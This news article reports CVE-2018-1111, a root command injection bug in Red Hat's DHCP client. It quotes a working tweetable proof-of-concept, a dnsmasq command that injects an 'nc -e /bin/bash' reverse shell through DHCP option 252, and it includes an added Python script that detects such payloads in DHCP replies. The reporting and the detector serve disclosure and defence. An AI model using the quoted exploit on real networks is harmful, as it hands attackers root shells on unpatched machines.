Red Hat admin? Get off Twitter and patch this DHCP client bug
Proof-of-concept fits in a Tweet and can take down all of RH's best bits
Red Hat has announced a critical vulnerability in its DHCP client, and while it doesn't have a brand name, it does have a Tweetable proof-of-concept.
Discovered by Googler Felix Wilhelm, CVE-2018-1111 is a command injection bug in the Red Hat Enterprise Linux and derivative DHCP clients.
Wilhelm Tweeted: “CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivatives: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.”
Here, in a Tweet from Barkın Kılıç, is the PoC:
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC— Barkın Kılıç (@Barknkilic) May 15, 2018
(The third image in that Tweet shows the attacker accessing the shell as root.)
Red Hat explained that “A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.”
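The PoC above puts a single quote and shell metacharacters into a DHCP option value (option 252), so a monitoring check can look for that shape in DHCP replies seen on the wire. The following Python is an added example, not code from the article or from Red Hat; the function names, the choice of which options count as text, and the sample bytes are assumptions made for illustration.

```python
# Added example (not from the article): scan the options field of a DHCP
# reply for text options that contain shell metacharacters.
SHELL_META = set(b"'\"`$;&|<>\\\n")          # byte values of risky characters
# Options that carry free-form text (RFC 2132) plus site-specific 224-254,
# which includes option 252 used in the PoC. This selection is an assumption.
TEXT_OPTIONS = {12, 14, 15, 17, 18, 40, 66, 67} | set(range(224, 255))

def parse_options(buf):
    """Yield (code, value) pairs from a DHCP options field (code, length, value)."""
    i = 0
    while i < len(buf):
        code = buf[i]
        if code == 0:                 # pad option has no length byte
            i += 1
            continue
        if code == 255:               # end option
            return
        if i + 1 >= len(buf):
            raise ValueError("truncated option header")
        length = buf[i + 1]
        value = buf[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError(f"option {code} is truncated")
        yield code, value
        i += 2 + length

def suspicious_options(buf):
    """Return (code, text, metacharacters) for each text option worth alerting on."""
    findings = []
    for code, value in parse_options(buf):
        if code not in TEXT_OPTIONS:
            continue                  # binary options (addresses, timers) are skipped
        meta = sorted({chr(b) for b in value if b in SHELL_META})
        if meta:
            findings.append((code, value.decode("latin-1"), meta))
    return findings

def encode(code, value):
    return bytes([code, len(value)]) + value

# Constructed sample: router and DNS options, then an option 252 value with the
# same quote-and-ampersand shape as the PoC but a harmless command.
SAMPLE = (encode(3, bytes([10, 1, 1, 1])) + encode(6, bytes([10, 1, 1, 39]))
          + encode(252, b"x'&echo constructed-sample #") + b"\xff")

if __name__ == "__main__":
    for code, text, meta in suspicious_options(SAMPLE):
        print(f"option {code}: {text!r} contains {meta}")
```

The DNS option in the sample deliberately contains the byte 0x27 (the address 10.1.1.39) to show that binary options are not flagged; only text options are inspected.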
Here's the full list of affected RHEL versions: Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).
Red Hat's update services for SAP Solutions on x86 and IBM Power architectures are also affected.